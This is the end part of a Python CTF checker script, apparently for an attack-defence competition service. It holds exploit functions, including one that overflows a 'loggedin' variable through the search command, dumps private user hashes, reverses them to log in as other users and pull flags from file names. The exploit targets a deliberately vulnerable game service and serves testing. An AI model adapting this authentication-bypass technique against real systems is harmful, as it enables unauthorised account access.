        resp += await session.readuntil(b"[q to quit]: ", ctx="getting file info (2)")
        if flag := searcher.search_flag(resp):
            break

    # Done!
    session.write(b"q\n")
    await session.drain()
    await session.readuntil(prompt)

    if flag is not None:
        return flag
    raise MumbleException("Exploit for flagstore 1 failed")


@checker.exploit(1)
async def exploit_hash_overflow(
    task: ExploitCheckerTaskMessage, di: DependencyInjector
) -> Optional[bytes]:
    searcher = await di.get(FlagSearcher)
    logger = await di.get(LoggerAdapter)
    assert task.attack_info is not None
    target_prefix = task.attack_info.split()[1][:-2].encode()

    # Overflow loggedin variable
    session = await di.get(Session)
    session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
    await session.drain()
    await session.readuntil(prompt, ctx="overflowing loggedin via search")
    session.write(b"auth\n")
    await session.drain()
    resp = await session.readuntil(prompt, ctx="checking auth success")
    if b"Already logged in!" not in resp:
        raise MumbleException("Exploit did not set 'loggedin' variable via overflow")

    # Get private user hashes via 'list'
    resp = nnb(await do_list(session, check=True))
    users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
    await session.exit()

    # Check if there is a flag in the response already
    # (shouldn't be, enochecker_test will throw an error if this succeeds)
    if flag := searcher.search_flag(resp):
        return flag

    logger.debug(f"Searching for user with prefix: {target_prefix!r}")
    logger.debug(f"Possible users: {users!r}")

    # Login as each private user
    for userhash in users:
        if not userhash.startswith(target_prefix):
            continue

        # Find preimage of user hash
        authstr = reverse_hash(userhash.decode())

        # Authenticate and check if the user is new
        session = await di.get(Session)
        logger.debug(f"Trying to login as user: {userhash!r}")
        if not await do_auth(session, authstr, check=False, newuser=False):
            await session.exit()
            # We don't raise an exception, because it could be that the user dir
            # was cleaned up just before we logged in, not necessarily because of
            # an invalid preimage. If there was a problem with the preimage
            # generation, we won't find a flag and an exception will be raised
            # later anyways...
            continue

        # List all private files of user
        resp = nnb(await do_list(session, check=True))
        await session.exit()

        # Search for flag in solid names
        solidnames = b"\n".join(
            [l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
        )
        if flag := searcher.search_flag(solidnames):
            return flag

    raise MumbleException("Exploit for flagstore 2 failed")


if __name__ == "__main__":
    checker.run(port=9091)
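# For local testing the checker can be run directly; it serves its checker
# interface on port 9091 and expects the service itself on port 9090
# (assuming this file is saved as checker.py):
#
#   python3 checker.py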